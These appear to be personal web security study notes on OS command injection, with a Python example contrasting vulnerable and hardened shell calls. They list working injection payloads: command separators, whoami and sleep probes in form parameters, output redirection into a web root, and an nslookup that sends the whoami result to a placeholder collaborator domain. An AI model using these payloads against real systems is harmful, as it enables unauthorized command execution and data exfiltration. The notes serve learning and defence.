Web Security Notes

Command Injection notes

The stock information is requested via a URL like https://insecure-website.com/stockStatus?productID=432&storeID=32

  • The application executes a shell command with the product and store IDs as arguments, such as stockreport.pl 432 32

  • For command injection, an attacker can submit the following input to execute an arbitrary command: & echo asdfsdf &. The backend then calls the command as follows: stockreport.pl 432 & echo asdfsdf & 32, and an error is returned.

e.g. productId=2&storeId=2|whoami in the POST request
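The stock-check call described above, as an added example (not code from the original notes or from PortSwigger): the "before" function pastes the IDs into a shell command line, the "after" function allow-lists them and runs the program without a shell. The inline Python one-liner standing in for stockreport.pl and all function names are assumptions.

```python
import re
import subprocess
import sys

# Stand-in for stockreport.pl (assumption): prints the arguments it was given.
SCRIPT = "import sys; print('report for', sys.argv[1:])"
ID_RE = re.compile(r"[0-9]{1,10}")


def stock_vulnerable(product_id: str, store_id: str) -> str:
    """Before: request values are pasted into a shell command line."""
    cmd = f'"{sys.executable}" -c "{SCRIPT}" {product_id} {store_id}'
    # shell=True hands the whole string to /bin/sh, so &, |, ; and newlines
    # in the values are parsed as command separators.
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def stock_hardened(product_id: str, store_id: str) -> str:
    """After: allow-list the values, then run the program without a shell."""
    for value in (product_id, store_id):
        # fullmatch, not match with '$': '$' also matches before a trailing
        # newline, and newline is one of the separators listed in these notes.
        if not ID_RE.fullmatch(value):
            raise ValueError(f"rejected non-numeric id: {value!r}")
    argv = [sys.executable, "-c", SCRIPT, product_id, store_id]
    # An argv list is passed to the program as-is; no shell parses it.
    done = subprocess.run(argv, capture_output=True, text=True, check=True)
    return done.stdout


def is_rejected(value: str) -> bool:
    """True when the hardened path refuses the value as a store ID."""
    try:
        stock_hardened("432", value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "32 & echo asdfsdf &"  # the injection string from these notes
    print("vulnerable:", stock_vulnerable("432", payload).splitlines())
    print("hardened rejects payload:", is_rejected(payload))
    print("hardened, valid ids:", stock_hardened("432", "32").strip())
```

In the vulnerable output, asdfsdf appears on a line of its own, which shows the shell ran echo as a separate command instead of passing the text to the report program.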

Useful Commands

| Purpose | Linux | Windows |
| --- | --- | --- |
| Name of user | whoami | whoami |
| OS | uname -a | ver |
| Network configuration | ifconfig | ipconfig /all |
| Network connections | netstat -an | netstat -an |
| Running processes | ps -ef | tasklist |

Ways of injecting OS commands

  • & , && , | , || (both Unix and Windows)

  • ; , 0x0a or \n (for Unix)

using time delays

e.g. POST request for a form submit => csrf=g12AXHTk57AsU2J2ID68mqsxwVByepIg&name=test&email=test%40gmail.com&subject=Testing&message=Testing+the+OS+command+injection

  • The command to inject is & sleep 10s # (the # comments out the commands that follow); URL-encode it before sending.

  • Then try injecting it at the end of each parameter (name, email, subject, message).

csrf=g12AXHTk57AsU2J2ID68mqsxwVByepIg&name=test&email=test%40gmail.com+%26+sleep+10s+%23&subject=Testing&message=Testing+the+OS+command+injection

redirecting output

& whoami > /var/www/static/whoami.txt &

%26+whoami+>+/var/www/images/whoami.txt+%23

with out-of-band interaction

& nslookup whoami.BURP-COLLABORATOR-DOMAIN &


Last updated 2 years ago